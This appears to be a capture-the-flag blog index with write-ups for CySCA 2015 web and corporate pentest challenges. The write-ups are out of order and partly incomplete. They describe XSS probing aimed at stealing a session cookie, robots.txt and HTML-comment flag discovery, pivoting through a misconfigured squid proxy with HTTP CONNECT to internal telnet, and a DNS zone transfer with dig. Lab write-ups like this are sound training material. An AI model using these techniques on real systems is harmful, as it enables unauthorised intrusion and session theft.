I’ve recently published all my writeups for CySCA 2015’s Web Pentest component as well as Corporate Pentest, however, Corporate Pentest is incomplete.

Corporate Pentest

Some writeups based on my experience during the competition. This was the first time I had ever experimented with corporate pentest style problems, hence why I did not get very far. I do, however, wish to share my experience.

1. Danger Zone
2. Sales Pitch
3. Explain This: Sales Pitch
4. Murphys Law
5. Flash Flood

Web Applications Pentest

Whilst writing these writeups, I actually stepped through them using the CySCA 2015 challenges, rather than guessing them from the notes I had taken during the competition.

CySCA have yet to release a “CySCA In A Box” yet, so I thought, rather than just making the challenge work just for me, I thought it would be beneficial to create a Vagrant environment so that anyone can get the challenges up and running in no time at all.

Head on over to this repo/page on my github for instructions on getting set up.

1. In Plain Sight
2. Bots Dream Of Electric Flags
3. The Eagle Has Landed
4. Love Letters
5. Business Excellence
6. Turn It On And Off
7. Terminal Situation

If you’ve got any questions, feel free to tweet me: @nickw444

It’s no coincidence this challenge is called Terminal Situation, we have a terminal sitting right in front of us.

As an executive, we notice we’ve got some additional functionality. We notice another menu item “IT Support” and the “Executive Board” option on the home page.

We need to gain access to the CVO (Angelina’s) account. In order to do this, we most likely will need to steal a cookie. We take a look in the leave details section and put in a leave request to see if it’s XSS protected. Additionally, we notice that the session cookie on this website is not HTTPOnly. Time to steal.

The browser will prevent javascript accessing HTTPOnly cookies, hence, if it was HTTP Only, we would be looking in the wrong place.

We do the naive thing and just put <h1>Hello</h1> in. However, the ticker spits out WARNING: XSS detected! You have been reported.. Additionally, it appears the XSS is stripped client side too.

Now that we’re logged in, lets take a poke around and see what we’re dealing with. There appears to be sections to:

• Apply for leave, where we submit a text request. Maybe XSS or Injection on this?
• Staff Directory, details about different staff members.
  • The “Network Administrator” has some binary in his profile. We’ll decode that later.
• There seems to also be a message board. Maybe XSS or Injection.
• There’s also a mail inbox.

We need to obtain a working account on the system.

We Register with the following details:

Name: Nick
Email: [email protected]
Password: nick
Confirm: nick
Secret Q: q
Secret A: a

We notice a message at the top:

Account Registered - Awaiting IT approval.

Our WebSec foo tells us we should have a look in robots.txt. Not only that, but the title does give this one away - Bots.

GET /robots.txt HTTP/1.1

User-agent: *
Disallow: /admin
Disallow: /backup
Disallow: /protected

Lets take a look in these.

• /admin - Nothing here, just a picture
• /backup - Nothing here, just another picture
• /protected - Reveals the flag FLAG{1b000000000000000000000000000000}

This was any easy one - Snoop around the html source code on the login page. You’ll find a HTML Comment around line 99:

<!-- X marks the spot -->
<!-- RkxBR3sxYTAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMH0N -->

We notice that it’s Base64 looking. We decode this as base64:

>>> str = 'RkxBR3sxYTAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMH0N'
>>> print(str.decode('base64'))
FLAG{1a000000000000000000000000000000}

We are now connected to the company’s proxy. We are given the hint early on that:

Consider that the ECWI system is secure and does not allow direct traffic from the DMZ to the internal network. Additionally, it does not allow direct connections on arbitary ports from the internal network to the DMZ”

We perform some network connection analysis, using ifconfig, route, arp, netstat, and additionally look at the squid access log.

From Sales Pitch we discover the server has some internal bound services, most notably telnet (port 23) - These are listed on the internal management page. It is only accessible from inside the network however.

Fortunately, telnet is a text based protocol, so we can easily just do a proxyHTTP CONNECT to it via the proxy.

$> telnet 172.16.5.30 3128
CONNECT 10.10.5.30:23 HTTP/1.0

Task: Explain the misconfiguration of the squid proxy

Nb, this could only be answered once the flag for Murphy’s law was captured, since there was no easy solution to cat /etc/squid3/squid.conf any other way.

This is due to misconfiguration in the proxy configuration file:

$> cat /etc/squid3/squid.conf

Task: Connect to the management panel of the proxy server

Proxy is misconfigured, allowing anyone externally to use it to access internal infrastructure.

We take advantage of this. We set our HTTP proxy to it, however we still don’t know what the box’s internal IP is.

We try 127.0.0.1 via the proxy, however no luck. Upon inspecting the “Frontend” page we realise it has INT: x.x.x.x EXT: x.x.x.x in the <title></title> html tag.

We load up INT: x.x.x.x via the proxy and the flag is revealed.

Similar to last year, we perform a domain transfer request to show all the records in the domain, revealing the flag.

$> dig -t axfr ecwi.cysca @ns.ecwi.cysca

; <<>> DiG 9.8.3-P1 <<>> -t axfr ecwi.cysca @ns.ecwi.cysca
;; global options: +cmd
ecwi.cysca.     86400   IN  SOA ns.ecwi.cysca. admin.ecwi.cysca. 2015070401 28800 7200 864000 86400
ecwi.cysca.     86400   IN  NS  ns.ecwi.cysca.
ecwi.cysca.     86400   IN  A   172.16.5.80
ns.ecwi.cysca.      300 IN  A   172.16.5.53
proxy.ecwi.cysca.   300 IN  A   172.16.5.30
support.ecwi.cysca. 300 IN  A   172.16.5.85
www.ecwi.cysca.     300 IN  A   172.16.5.80
zonetransferflag.ecwi.cysca. 300 IN TXT "FLAG{749929CE145DD73A8D1530E2170B1587}"
ecwi.cysca.     86400   IN  SOA ns.ecwi.cysca. admin.ecwi.cysca. 2015070401 28800 7200 864000 86400
;; Query time: 221 msec
;; SERVER: 172.16.5.53#53(172.16.5.53)
;; WHEN: Wed Sep 30 19:35:44 2015
;; XFR size: 9 records (messages 1, bytes 289)